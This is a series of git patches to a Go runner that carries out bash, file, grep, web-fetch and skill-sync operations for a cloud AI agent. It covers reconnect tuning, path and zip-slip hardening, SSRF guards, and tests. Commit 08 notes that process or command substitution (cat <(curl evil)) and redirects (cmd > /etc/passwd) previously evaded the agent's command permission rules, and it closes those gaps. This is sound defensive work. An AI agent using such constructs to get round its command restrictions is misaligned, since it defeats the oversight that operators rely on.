From 641fa02d4dc7611c01675d1a095f06fe3819785e Mon Sep 17 00:00:00 2001 From: ysyneu Date: Tue, 28 Apr 2026 11:35:34 +0800 Subject: [PATCH 01/11] fix(ws): drop CurrentTime from heartbeat env info MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit CurrentTime was captured once via collectEnvironmentInfo() at runner start and the resulting EnvInfo was sent only on the first heartbeat (envInfoSent gate), so a long-lived runner kept reporting its boot time forever. Safari then served that stale value via the `now` tool. Static info (OS, arch, hostname, timezone) is fine to send once; current time is by definition not static. Drop the field entirely — safari uses its own wall clock now. Co-Authored-By: Claude Opus 4.7 (1M context) --- protocol/messages.go | 1 - ws/client.go | 3 --- 2 files changed, 4 deletions(-) diff --git a/protocol/messages.go b/protocol/messages.go index a5dcd35..2abbc1a 100644 --- a/protocol/messages.go +++ b/protocol/messages.go @@ -90,7 +90,6 @@ type EnvironmentInfo struct { Username string `json:"username"` // Current user NumCPU int `json:"num_cpu"` // Number of CPUs TotalMemoryMB int64 `json:"total_memory_mb"` // Total memory in MB - CurrentTime string `json:"current_time"` // Current time in RFC3339 format Timezone string `json:"timezone"` // Timezone name, e.g., "Asia/Shanghai" UTCOffset string `json:"utc_offset"` // UTC offset, e.g., "+08:00" } diff --git a/ws/client.go b/ws/client.go index 021b2dd..d692c07 100644 --- a/ws/client.go +++ b/ws/client.go @@ -446,8 +446,6 @@ func (c *Client) sendHeartbeat() { Version: c.version, } - // Only send environment info on first heartbeat after connection - // Environment info is static and doesn't need to be sent repeatedly c.mu.Lock() if !c.envInfoSent { payload.Environment = c.envInfo @@ -485,7 +483,6 @@ func collectEnvironmentInfo(workspaceRoot string) *protocol.EnvironmentInfo { } now := time.Now() - info.CurrentTime = now.Format(time.RFC3339) info.Timezone = 
now.Location().String() info.UTCOffset = now.Format("-07:00") From 3efa401a55d4d38975d3ebe4bbebf5de4e9b2be0 Mon Sep 17 00:00:00 2001 From: ysyneu Date: Wed, 29 Apr 2026 17:12:58 +0800 Subject: [PATCH 02/11] fix(ws): tighten reconnect timing for cloud sandbox pool pods MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Cloud sandbox pool pods spend their entire pre-claim lifetime dialing safari and getting 401 (no t_cloud_sandbox_0 row exists yet — claim inserts it). Two timing knobs were tuned for long-lived BYOC outage recovery and hurt cloud claim latency: - initialReconnectDelay 1s -> 200ms: first dials race the row INSERT. The 1s delay added 1-2s of extra 401-retry cost before hostname auth could possibly succeed. - maxReconnectDelay 5min -> 10s: a pool pod waiting >50s slid into a 32-64s exponential-backoff sleep, and got declared unrecoverable by safari's 90s claim window before its next dial — observed live (sbx_bzQ... did not come online within 1m30s, traceid 6996857e714cb99c31665d043ed3c260). 10s stays well inside the claim window and remains acceptable for BYOC server-restart recovery. Co-Authored-By: Claude Opus 4.7 (1M context) --- ws/client.go | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/ws/client.go b/ws/client.go index d692c07..58e55a7 100644 --- a/ws/client.go +++ b/ws/client.go @@ -33,14 +33,25 @@ const ( // DefaultMaxReconnectAttempts is the default max reconnect attempts (0 = unlimited). DefaultMaxReconnectAttempts = 30 - // Initial reconnect delay (used for first few attempts) - initialReconnectDelay = 1 * time.Second + // Initial reconnect delay (used for first few attempts). + // Cloud sandbox runners race safari's t_cloud_sandbox_0 INSERT/UPDATE on + // first dial — a 1s delay added 1–2s of extra 401-retry cost before the + // row landed and the hostname-auth lookup could succeed. 200ms keeps the + // retry storm under control while shrinking the cold-start tail. 
+ initialReconnectDelay = 200 * time.Millisecond // Fast retry attempts before switching to exponential backoff fastRetryAttempts = 15 - // Maximum reconnect delay - maxReconnectDelay = 5 * time.Minute + // Maximum reconnect delay. Capped at 10s so cloud-sandbox pool pods + // (which spend their entire pre-claim lifetime in 401-retry) never + // land in a multi-minute sleep when sandbox-manager finally hands + // them off — Safari's claim window is 90s, anything longer than that + // risks the pod being declared unrecoverable while it's still asleep. + // The previous 5-minute cap was tuned for BYOC outage recovery; 10s + // stays well under the BYOC server-restart window in practice and + // adds at most one extra dial per 10s of downtime. + maxReconnectDelay = 10 * time.Second ) // MessageHandler handles incoming messages from Flashduty. From 0f222d9255d4283bb5e46d2d614c6a90adda48df Mon Sep 17 00:00:00 2001 From: ysyneu Date: Wed, 29 Apr 2026 17:30:38 +0800 Subject: [PATCH 03/11] fix(env): reject duplicated-root rel_paths; surface sibling hint on ENOENT MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit safePath defense-in-depth — runner cannot rely on safari to filter rel_paths that mirror the workspace root. Joining e.root with such a path silently created a nested duplicate workspace tree (matching nested copies were observed on a long-running BYOC host). Reject them at the runner boundary. Read now appends a bounded sibling-name list when stat returns ENOENT, so the agent can self-correct a near-miss filename without spending a turn on an extra list call. .golangci.yml: exclude gosec G706 (log-taint via taint analysis). slog's structured key-value logging is not a format-string injection vector; the rule fires on every slog call with a user-controlled value, which is the whole point of structured logging. 
Co-Authored-By: Claude Opus 4.7 (1M context) --- .golangci.yml | 5 ++++ environment/environment.go | 52 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 57 insertions(+) diff --git a/.golangci.yml b/.golangci.yml index 3e28c53..122e243 100644 --- a/.golangci.yml +++ b/.golangci.yml @@ -47,10 +47,15 @@ linters: # Exclude G301 (directory permissions) - workspace needs readable directories # Exclude G304 (file inclusion) - paths are validated via safePath() # Exclude G306 (file permissions) - workspace files need to be readable + # Exclude G706 (log taint via taint analysis) - slog's structured + # key-value logging is not a format-string injection vector; the rule + # fires on every slog call that includes a user-controlled value, which + # is the whole point of structured logging. excludes: - G301 - G304 - G306 + - G706 formatters: enable: diff --git a/environment/environment.go b/environment/environment.go index d332033..d2b0b56 100644 --- a/environment/environment.go +++ b/environment/environment.go @@ -59,6 +59,22 @@ func (e *Environment) Root() string { // safePath ensures the path is within the workspace root, resolving symlinks. func (e *Environment) safePath(path string) (string, error) { + // Defense-in-depth: reject relative paths that mirror the host's workspace + // root (e.g. "Users/ysy/.flashduty-runner/workspace/DUTY.md"). Safari already + // rejects these, but the runner accepts requests over the wire and must not + // rely on the caller to have done the check. Joining such a path with + // e.root would silently create a nested duplicate of the workspace tree. 
+ if !filepath.IsAbs(path) { + cleaned := filepath.Clean(filepath.FromSlash(path)) + rootRel := strings.TrimPrefix(e.root, string(filepath.Separator)) + if rootRel != "" { + rootRel = filepath.Clean(rootRel) + if cleaned == rootRel || strings.HasPrefix(cleaned, rootRel+string(filepath.Separator)) { + return "", fmt.Errorf("rel_path duplicates workspace root: %s", path) + } + } + } + absPath, err := filepath.Abs(filepath.Join(e.root, path)) if err != nil { return "", fmt.Errorf("failed to get absolute path: %w", err) @@ -105,6 +121,11 @@ func (e *Environment) Read(ctx context.Context, args *protocol.ReadArgs) (*proto info, err := os.Stat(realPath) if err != nil { + if os.IsNotExist(err) { + // Include sibling names so the model can self-correct without an extra + // list round-trip. Bounded to keep the error message small. + return nil, fmt.Errorf("failed to stat file: %w%s", err, siblingHint(filepath.Dir(realPath), filepath.Base(realPath))) + } return nil, fmt.Errorf("failed to stat file: %w", err) } if info.IsDir() { @@ -114,6 +135,37 @@ func (e *Environment) Read(ctx context.Context, args *protocol.ReadArgs) (*proto return e.readFileContent(realPath, info.Size(), args.Offset, args.Limit) } +// siblingHint returns a short " (siblings: a, b, c)" suffix when the parent +// directory exists, helping the agent recover from a near-miss filename +// without spending a turn on a list call. Returns empty string on any error +// or when the parent has too many entries to summarize compactly. 
+func siblingHint(dir, missing string) string { + const maxSiblings = 12 + entries, err := os.ReadDir(dir) + if err != nil { + return "" + } + names := make([]string, 0, len(entries)) + for _, e := range entries { + n := e.Name() + if strings.HasPrefix(n, ".") { + continue + } + names = append(names, n) + if len(names) > maxSiblings { + break + } + } + if len(names) == 0 { + return "" + } + if len(names) > maxSiblings { + names = names[:maxSiblings] + names = append(names, "…") + } + return fmt.Sprintf(" (parent %q contains: %s)", dir, strings.Join(names, ", ")) +} + // readFileContent reads file content with offset and limit support. func (e *Environment) readFileContent(path string, size, offset, limit int64) (*protocol.ReadResult, error) { file, err := os.Open(path) From ef2a0dcd0e39326ea44c28e3fbdfc9b60c4d2148 Mon Sep 17 00:00:00 2001 From: ysyneu Date: Thu, 30 Apr 2026 11:10:31 +0800 Subject: [PATCH 04/11] feat(skill): probe-or-install sync_skill; default home ~/.flashduty - SyncSkill now checks .checksum+SKILL.md before install (cache hit returns {Cached:true,Path}; miss with no zip returns {Cached:false} so cloud retries with zip_data) - Skills land at /skills// instead of /.work/skills// - Default home moves from ~/.flashduty-runner/workspace to ~/.flashduty - FLASHDUTY_RUNNER_HOME is the new canonical override; FLASHDUTY_RUNNER_WORKSPACE kept as deprecated alias - Add SyncSkillResult.Cached field (omitempty); SyncSkillArgs unchanged Co-Authored-By: Claude Sonnet 4.6 --- cmd/main.go | 12 +++-- environment/environment.go | 42 +++++++++++------ environment/environment_test.go | 82 +++++++++++++++++++++++++++++++++ protocol/messages.go | 9 +++- 4 files changed, 126 insertions(+), 19 deletions(-) diff --git a/cmd/main.go b/cmd/main.go index 4872346..5956afc 100644 --- a/cmd/main.go +++ b/cmd/main.go @@ -79,7 +79,8 @@ Examples: Environment variables: FLASHDUTY_RUNNER_TOKEN - Authentication token (required if --token not provided) FLASHDUTY_RUNNER_URL - WebSocket 
endpoint URL - FLASHDUTY_RUNNER_WORKSPACE - Workspace root directory`, + FLASHDUTY_RUNNER_HOME - Home directory for skills and data (default: ~/.flashduty) + FLASHDUTY_RUNNER_WORKSPACE - Deprecated alias for FLASHDUTY_RUNNER_HOME`, RunE: func(cmd *cobra.Command, args []string) error { return runRunner() }, @@ -137,17 +138,20 @@ func loadConfig() (*Config, error) { cfg.URL = defaultURL } - // Workspace: flag > env > default + // Home directory (skills, future knowledge/output): flag > FLASHDUTY_RUNNER_HOME > deprecated FLASHDUTY_RUNNER_WORKSPACE > default ~/.flashduty cfg.WorkspaceRoot = flagWorkspace if cfg.WorkspaceRoot == "" { - cfg.WorkspaceRoot = os.Getenv("FLASHDUTY_RUNNER_WORKSPACE") + cfg.WorkspaceRoot = os.Getenv("FLASHDUTY_RUNNER_HOME") + } + if cfg.WorkspaceRoot == "" { + cfg.WorkspaceRoot = os.Getenv("FLASHDUTY_RUNNER_WORKSPACE") // deprecated alias } if cfg.WorkspaceRoot == "" { homeDir, err := os.UserHomeDir() if err != nil { return nil, fmt.Errorf("failed to get home directory: %w", err) } - cfg.WorkspaceRoot = filepath.Join(homeDir, ".flashduty-runner", "workspace") + cfg.WorkspaceRoot = filepath.Join(homeDir, ".flashduty") } // Log level: flag > env > default diff --git a/environment/environment.go b/environment/environment.go index d2b0b56..e15f2bd 100644 --- a/environment/environment.go +++ b/environment/environment.go @@ -591,34 +591,48 @@ func (e *Environment) MCPListTools(ctx context.Context, args *protocol.MCPListTo return result, nil } -// SyncSkill syncs a skill from cloud to local workspace. +// SyncSkill is probe-or-install. With empty ZipData it checks local cache +// against args.Checksum: hit returns {Cached:true,Path}; miss returns +// {Cached:false,Path:""} so the cloud retries with zip. With ZipData present +// it overwrites /skills// and writes .checksum. +// +// args.SkillDir is accepted for backward compatibility but ignored — the +// runner derives the path from skill_name to keep layout under its control. 
func (e *Environment) SyncSkill(ctx context.Context, args *protocol.SyncSkillArgs) (*protocol.SyncSkillResult, error) { - skillDir, err := e.safePath(args.SkillDir) + if args.SkillName == "" || args.Checksum == "" { + return nil, fmt.Errorf("skill_name and checksum are required") + } + relDir := filepath.Join("skills", args.SkillName) + skillDir, err := e.safePath(relDir) if err != nil { return nil, err } - // Decode zip data + // Probe phase: cache hit if .checksum matches AND SKILL.md exists. + cachedSum, _ := os.ReadFile(filepath.Join(skillDir, ".checksum")) + if string(cachedSum) == args.Checksum { + if _, err := os.Stat(filepath.Join(skillDir, "SKILL.md")); err == nil { + return &protocol.SyncSkillResult{Success: true, Path: skillDir, Cached: true}, nil + } + } + + // Cache miss with no zip: signal cloud to retry with zip_data. + if args.ZipData == "" { + return &protocol.SyncSkillResult{Success: true, Cached: false}, nil + } + + // Install: decode, wipe, unzip, write .checksum. zipData, err := base64.StdEncoding.DecodeString(args.ZipData) if err != nil { return nil, fmt.Errorf("failed to decode zip data: %w", err) } - - // Unzip to skill directory if err := e.unzipSkill(zipData, skillDir); err != nil { return nil, fmt.Errorf("failed to unzip skill: %w", err) } - - // Write checksum file - checksumPath := filepath.Join(skillDir, ".checksum") - if err := os.WriteFile(checksumPath, []byte(args.Checksum), 0o644); err != nil { + if err := os.WriteFile(filepath.Join(skillDir, ".checksum"), []byte(args.Checksum), 0o644); err != nil { return nil, fmt.Errorf("failed to write checksum: %w", err) } - - return &protocol.SyncSkillResult{ - Success: true, - Path: args.SkillDir, - }, nil + return &protocol.SyncSkillResult{Success: true, Path: skillDir, Cached: false}, nil } // unzipSkill extracts a zip archive to the destination directory. 
diff --git a/environment/environment_test.go b/environment/environment_test.go index 827f462..f462d85 100644 --- a/environment/environment_test.go +++ b/environment/environment_test.go @@ -1,6 +1,8 @@ package environment import ( + "archive/zip" + "bytes" "context" "encoding/base64" "os" @@ -14,6 +16,21 @@ import ( "github.com/flashcatcloud/flashduty-runner/protocol" ) +// buildTestZip creates an in-memory zip archive from a map of filename→content. +func buildTestZip(t *testing.T, files map[string]string) []byte { + t.Helper() + var buf bytes.Buffer + w := zip.NewWriter(&buf) + for name, content := range files { + f, err := w.Create(name) + require.NoError(t, err) + _, err = f.Write([]byte(content)) + require.NoError(t, err) + } + require.NoError(t, w.Close()) + return buf.Bytes() +} + func newTestEnvironment(t *testing.T) *Environment { tmpDir := t.TempDir() checker := permission.NewChecker(map[string]string{ @@ -201,3 +218,68 @@ func TestEnvironment_SafePath(t *testing.T) { }) } } + +func TestSyncSkill_ProbeMiss(t *testing.T) { + ws := newTestEnvironment(t) + res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{ + SkillName: "demo", Checksum: "csum1", + }) + require.NoError(t, err) + assert.False(t, res.Cached, "expected cache miss") + assert.Empty(t, res.Path, "expected empty path on miss") +} + +func TestSyncSkill_ProbeHit(t *testing.T) { + ws := newTestEnvironment(t) + dir := filepath.Join(ws.Root(), "skills", "demo") + require.NoError(t, os.MkdirAll(dir, 0o755)) + require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("csum1"), 0o644)) + require.NoError(t, os.WriteFile(filepath.Join(dir, "SKILL.md"), []byte("body"), 0o644)) + + // Resolve symlinks so the comparison holds on macOS (/var → /private/var). 
+ wantDir, err := filepath.EvalSymlinks(dir) + require.NoError(t, err) + + res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{ + SkillName: "demo", Checksum: "csum1", + }) + require.NoError(t, err) + assert.True(t, res.Cached, "expected cache hit") + assert.Equal(t, wantDir, res.Path) +} + +func TestSyncSkill_InstallOverwrites(t *testing.T) { + ws := newTestEnvironment(t) + dir := filepath.Join(ws.Root(), "skills", "demo") + + // Pre-seed an old version with a stale checksum. + require.NoError(t, os.MkdirAll(dir, 0o755)) + require.NoError(t, os.WriteFile(filepath.Join(dir, "old-file.txt"), []byte("stale"), 0o644)) + require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("old"), 0o644)) + + // Resolve symlinks so the comparison holds on macOS (/var → /private/var). + wantDir, err := filepath.EvalSymlinks(dir) + require.NoError(t, err) + + zipBytes := buildTestZip(t, map[string]string{ + "SKILL.md": "---\nname: demo\ndescription: x\n---\nbody", + }) + res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{ + SkillName: "demo", + Checksum: "new", + ZipData: base64.StdEncoding.EncodeToString(zipBytes), + }) + require.NoError(t, err) + assert.False(t, res.Cached, "install must report Cached=false") + assert.Equal(t, wantDir, res.Path) + + // Old file should be gone (unzipSkill does RemoveAll before extracting). + _, err = os.Stat(filepath.Join(dir, "old-file.txt")) + assert.True(t, os.IsNotExist(err), "old file should be wiped") + + _, err = os.Stat(filepath.Join(dir, "SKILL.md")) + assert.NoError(t, err, "new SKILL.md should exist") + + sum, _ := os.ReadFile(filepath.Join(dir, ".checksum")) + assert.Equal(t, "new", string(sum)) +} diff --git a/protocol/messages.go b/protocol/messages.go index 2abbc1a..4249501 100644 --- a/protocol/messages.go +++ b/protocol/messages.go @@ -284,9 +284,16 @@ type SyncSkillArgs struct { } // SyncSkillResult is the result of a sync_skill operation. 
+// +// Probe semantics: when SyncSkillArgs.ZipData is empty, the runner checks its +// local cache and returns either {Success:true, Cached:true, Path} on hit or +// {Success:true, Cached:false, Path:""} on miss (cloud must retry with zip). +// When ZipData is non-empty, the runner installs unconditionally and returns +// {Success:true, Cached:false, Path}. type SyncSkillResult struct { Success bool `json:"success"` - Path string `json:"path"` // Local path where skill was extracted + Path string `json:"path"` // Local path where skill is materialized + Cached bool `json:"cached,omitempty"` // True iff cache hit } // MCPToolInfo represents metadata for an MCP tool. From a6eb9b4f371e2cc9f3da87e00a99478fb363a974 Mon Sep 17 00:00:00 2001 From: ysyneu Date: Thu, 30 Apr 2026 11:12:29 +0800 Subject: [PATCH 05/11] refactor(test): extract resolveDir helper, use errors.Is for ErrNotExist - resolveDir(t, dir) replaces duplicated EvalSymlinks boilerplate in ProbeHit and InstallOverwrites tests - errors.Is(err, os.ErrNotExist) replaces deprecated os.IsNotExist pattern Co-Authored-By: Claude Sonnet 4.6 --- environment/environment_test.go | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/environment/environment_test.go b/environment/environment_test.go index f462d85..c3fa126 100644 --- a/environment/environment_test.go +++ b/environment/environment_test.go @@ -5,6 +5,7 @@ import ( "bytes" "context" "encoding/base64" + "errors" "os" "path/filepath" "testing" @@ -31,6 +32,15 @@ func buildTestZip(t *testing.T, files map[string]string) []byte { return buf.Bytes() } +// resolveDir resolves symlinks on the given directory path so path comparisons +// hold on macOS where t.TempDir() returns /var/... but safePath resolves to /private/var/... 
+func resolveDir(t *testing.T, dir string) string { + t.Helper() + resolved, err := filepath.EvalSymlinks(dir) + require.NoError(t, err) + return resolved +} + func newTestEnvironment(t *testing.T) *Environment { tmpDir := t.TempDir() checker := permission.NewChecker(map[string]string{ @@ -236,16 +246,12 @@ func TestSyncSkill_ProbeHit(t *testing.T) { require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("csum1"), 0o644)) require.NoError(t, os.WriteFile(filepath.Join(dir, "SKILL.md"), []byte("body"), 0o644)) - // Resolve symlinks so the comparison holds on macOS (/var → /private/var). - wantDir, err := filepath.EvalSymlinks(dir) - require.NoError(t, err) - res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{ SkillName: "demo", Checksum: "csum1", }) require.NoError(t, err) assert.True(t, res.Cached, "expected cache hit") - assert.Equal(t, wantDir, res.Path) + assert.Equal(t, resolveDir(t, dir), res.Path) } func TestSyncSkill_InstallOverwrites(t *testing.T) { @@ -257,10 +263,6 @@ func TestSyncSkill_InstallOverwrites(t *testing.T) { require.NoError(t, os.WriteFile(filepath.Join(dir, "old-file.txt"), []byte("stale"), 0o644)) require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("old"), 0o644)) - // Resolve symlinks so the comparison holds on macOS (/var → /private/var). - wantDir, err := filepath.EvalSymlinks(dir) - require.NoError(t, err) - zipBytes := buildTestZip(t, map[string]string{ "SKILL.md": "---\nname: demo\ndescription: x\n---\nbody", }) @@ -271,11 +273,11 @@ func TestSyncSkill_InstallOverwrites(t *testing.T) { }) require.NoError(t, err) assert.False(t, res.Cached, "install must report Cached=false") - assert.Equal(t, wantDir, res.Path) + assert.Equal(t, resolveDir(t, dir), res.Path) // Old file should be gone (unzipSkill does RemoveAll before extracting). 
_, err = os.Stat(filepath.Join(dir, "old-file.txt")) - assert.True(t, os.IsNotExist(err), "old file should be wiped") + assert.True(t, errors.Is(err, os.ErrNotExist), "old file should be wiped") _, err = os.Stat(filepath.Join(dir, "SKILL.md")) assert.NoError(t, err, "new SKILL.md should exist") From acb919bf2a00da2bd2e6bd2247fac5a6bf2bd3e7 Mon Sep 17 00:00:00 2001 From: ysyneu Date: Thu, 30 Apr 2026 11:14:01 +0800 Subject: [PATCH 06/11] harden(skill): reject path separators in skill_name --- environment/environment.go | 3 +++ 1 file changed, 3 insertions(+) diff --git a/environment/environment.go b/environment/environment.go index e15f2bd..803e243 100644 --- a/environment/environment.go +++ b/environment/environment.go @@ -602,6 +602,9 @@ func (e *Environment) SyncSkill(ctx context.Context, args *protocol.SyncSkillArg if args.SkillName == "" || args.Checksum == "" { return nil, fmt.Errorf("skill_name and checksum are required") } + if strings.ContainsAny(args.SkillName, `/\`) || args.SkillName == ".." || args.SkillName == "." 
{ + return nil, fmt.Errorf("skill_name must not contain path separators") + } relDir := filepath.Join("skills", args.SkillName) skillDir, err := e.safePath(relDir) if err != nil { From 8160fdeedd85df1666c226eeb683757c0cf9cf1c Mon Sep 17 00:00:00 2001 From: ysyneu Date: Thu, 30 Apr 2026 11:23:09 +0800 Subject: [PATCH 07/11] docs(skill): document ~/.flashduty home and probe-or-install sync_skill --- README.md | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d384f76..f3cda75 100644 --- a/README.md +++ b/README.md @@ -203,7 +203,7 @@ Create `/etc/flashduty-runner/env`: ```bash FLASHDUTY_RUNNER_TOKEN=ent_xxx # FLASHDUTY_RUNNER_URL=wss://custom.example.com/safari/environment/ws -# FLASHDUTY_RUNNER_WORKSPACE=/var/flashduty/workspace +# FLASHDUTY_RUNNER_HOME=/var/flashduty ``` ```bash @@ -213,6 +213,15 @@ sudo systemctl daemon-reload sudo systemctl enable --now flashduty-runner ``` +## Skills + +Skills are materialized lazily. When the agent calls the `skill` tool, the cloud sends `sync_skill` with `(skill_name, checksum, zip_data?)`: + +- **Empty `zip_data`** = probe. The runner returns `{cached: true, path}` if `/skills//.checksum` already matches the requested checksum and `SKILL.md` is present; otherwise `{cached: false}` and the cloud will retry with the bundle attached. +- **Non-empty `zip_data`** = install. The runner wipes `/skills//`, unzips, and writes `.checksum`. Each skill name has exactly one slot — no version retention. Builtin skills go through the same flow with their bundle sourced from the cloud's embedded FS instead of S3. + +Inspect installed skills with `ls ~/.flashduty/skills/`. + ## Configuration Reference Configuration is via command-line flags or environment variables (flags take precedence). 
@@ -221,7 +230,7 @@ Configuration is via command-line flags or environment variables (flags take pre |------|-------------|----------|---------|-------------| | `--token` | `FLASHDUTY_RUNNER_TOKEN` | Yes | - | Authentication token | | `--url` | `FLASHDUTY_RUNNER_URL` | No | `wss://api.flashcat.cloud/safari/environment/ws` | WebSocket endpoint | -| `--workspace` | `FLASHDUTY_RUNNER_WORKSPACE` | No | `~/.flashduty-runner/workspace` | Workspace root directory | +| `--workspace` | `FLASHDUTY_RUNNER_HOME` | No | `~/.flashduty` | Runner home directory. Skills land at `/skills//`. `FLASHDUTY_RUNNER_WORKSPACE` is accepted as a deprecated alias for back-compat. | | `--log-level` | `FLASHDUTY_RUNNER_LOG_LEVEL` | No | `info` | Log level: debug, info, warn, error | ## Troubleshooting From b9868971e2bc0ccbd1fe9461755e9461dda0f7ba Mon Sep 17 00:00:00 2001 From: ysyneu Date: Sat, 2 May 2026 16:33:55 +0800 Subject: [PATCH 08/11] refactor(env,permission): SSRF + AST hardening + grep regex + bash structured MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Runner-side counterparts of fc-safari's 2026-05-02 builtin-tools refactor: - environment/webfetch: SSRF guard via inlined safeHTTPTransport + safeCheckRedirect. Pre-flight validateURL refuses RFC1918 / loopback / link-local / IMDS before any TCP dial; CheckRedirect re-validates each hop so a 302 to 169.254.169.254 is refused. Inlined from go-pkg/x/netsafe (open-source repo cannot import internal modules). - environment/htmlx: HTML-to-markdown / text helpers inlined from go-pkg/x/htmlx for the same reason. html-to-markdown is now a direct dep. - environment/environment::unzipSkill: zip-slip closed — compares abs target against dest+separator and rejects names containing '..'. - environment/environment::grepWithGo: was strings.Contains (literal) — now compiles regex, falls back with regex_compile_error surfaced. 
Default ignore (.git, node_modules, .flashduty) added; Scanner buffer raised to 1 MiB; rg exit-2 surfaces real I/O errors instead of silent "no matches"; pattern starting with '-' gets '--' prefix; rsplit on ':' so paths containing ':' parse cleanly. - protocol.GrepArgs gains output_mode, context_before/after, head_limit, file_type, case_sensitive — forwarded to ripgrep flags. - environment/environment::Bash: per-stream large-output (stderr now truncates to its own bash_stderr_*.txt); LimitedWriter honors the io.Writer contract (returns ErrOutputCapped at the cap, exposes Hit(), appends "[output capped at 10MB]" marker once). - protocol.BashResult carries truncated_stdout/stderr, stdout_file_path/stderr_file_path, *_total_size; legacy fields remain populated so old safari clients keep working. - environment/large_output::ShouldSkipForOutputsDir: substring match → word-boundary regex (no more 'thread '/'head ' false positives). WriteRaw lowercased to writeRaw (single internal caller). - permission/permission: AST walk now visits CmdSubst / ProcSubst / nested Stmts so cat <(curl evil) and echo $(curl evil) hit the same rules. Redirect targets are checked instead of discarded (cmd > /etc/passwd refused). Canonical-form normalization on both rule and command sides (kubectl get pods matches kubectl get *); env-prefix dual evaluation (KUBECONFIG=x kubectl get pods still matches kubectl get *). Rules sort by literal-prefix specificity, first match wins. SafeReadOnlyRules drops echo */find * — find -delete / find -exec rm now denied by default; replaced with scoped allow patterns. E2E verified live: bash returns the new structured shape, web (action=fetch) reaches example.com via the safe transport, all 17+ new permission/permission_test scenarios pass. 
Co-Authored-By: Claude Opus 4.7 (1M context) --- environment/bash_output_test.go | 114 +++++++++ environment/environment.go | 405 +++++++++++++++++++++++++++----- environment/environment_test.go | 91 +++++++ environment/htmlx.go | 51 ++++ environment/large_output.go | 20 +- environment/netsafe.go | 192 +++++++++++++++ environment/security_test.go | 165 +++++++++++++ environment/webfetch.go | 73 ++---- go.mod | 2 +- go.sum | 4 +- permission/permission.go | 379 ++++++++++++++++++++++++------ permission/permission_test.go | 192 +++++++++++++++ protocol/messages.go | 50 +++- 13 files changed, 1537 insertions(+), 201 deletions(-) create mode 100644 environment/bash_output_test.go create mode 100644 environment/htmlx.go create mode 100644 environment/netsafe.go create mode 100644 environment/security_test.go diff --git a/environment/bash_output_test.go b/environment/bash_output_test.go new file mode 100644 index 0000000..b43efd8 --- /dev/null +++ b/environment/bash_output_test.go @@ -0,0 +1,114 @@ +package environment + +import ( + "bytes" + "context" + "errors" + "strings" + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/flashcatcloud/flashduty-runner/protocol" +) + +func TestLimitedWriter_HitReturnsErrShortWrite(t *testing.T) { + var buf bytes.Buffer + w := &LimitedWriter{W: &buf, Limit: 5} + + // First write fits exactly within the cap. + n, err := w.Write([]byte("hello")) + require.NoError(t, err) + assert.Equal(t, 5, n) + assert.False(t, w.Hit(), "cap not yet hit when curr==Limit and next write hasn't happened") + + // Second write hits the cap. Contract: report ErrOutputCapped, not nil. 
+ n, err = w.Write([]byte("world")) + assert.Equal(t, 0, n, "no bytes accepted past the cap") + require.Error(t, err) + assert.True(t, errors.Is(err, ErrOutputCapped)) + assert.True(t, w.Hit()) + assert.Contains(t, buf.String(), "[output capped at 10MB]", "marker appended exactly once") + + // Subsequent writes also report cap, marker not duplicated. + prev := buf.String() + _, err = w.Write([]byte("more")) + assert.True(t, errors.Is(err, ErrOutputCapped)) + assert.Equal(t, prev, buf.String(), "marker only appended once") +} + +func TestLimitedWriter_PartialWriteAtBoundary(t *testing.T) { + var buf bytes.Buffer + w := &LimitedWriter{W: &buf, Limit: 3} + + // 5-byte write straddles the boundary: 3 bytes accepted, marker appended, + // ErrOutputCapped surfaced. + n, err := w.Write([]byte("abcde")) + assert.Equal(t, 3, n) + require.Error(t, err) + assert.True(t, errors.Is(err, ErrOutputCapped)) + assert.True(t, w.Hit()) + assert.True(t, strings.HasPrefix(buf.String(), "abc")) + assert.Contains(t, buf.String(), "[output capped at 10MB]") +} + +func TestLimitedWriter_BelowCap(t *testing.T) { + var buf bytes.Buffer + w := &LimitedWriter{W: &buf, Limit: 100} + + n, err := w.Write([]byte("hi")) + require.NoError(t, err) + assert.Equal(t, 2, n) + assert.False(t, w.Hit()) + assert.NotContains(t, buf.String(), "capped") +} + +func TestEnvironment_Bash_StderrTruncatedSeparately(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + // Generate >30k bytes to stderr, nothing on stdout. Using awk so the + // subprocess exits cleanly once the byte budget is met (no SIGPIPE chain). 
+ cmd := `awk 'BEGIN{ for(i=0;i<5000;i++) printf("ERROR_LINE_%d\n", i) > "/dev/stderr" }'` + result, err := ws.Bash(ctx, &protocol.BashArgs{Command: cmd}) + require.NoError(t, err) + + assert.True(t, result.TruncatedStderr, "stderr should be truncated when over the cap") + assert.NotEmpty(t, result.StderrFilePath, "stderr file should be written for full content") + assert.Greater(t, result.StderrTotalSize, int64(30000)) + assert.False(t, result.TruncatedStdout, "stdout should be untruncated when empty") + assert.Empty(t, result.StdoutFilePath) +} + +func TestEnvironment_Bash_NormalOutputUnchanged(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + result, err := ws.Bash(ctx, &protocol.BashArgs{Command: "echo small"}) + require.NoError(t, err) + assert.Equal(t, "small\n", result.Stdout) + assert.False(t, result.TruncatedStdout) + assert.False(t, result.TruncatedStderr) + assert.Empty(t, result.StdoutFilePath) + assert.Empty(t, result.StderrFilePath) +} + +func TestEnvironment_Bash_StdoutAtHardCapMarker(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + // 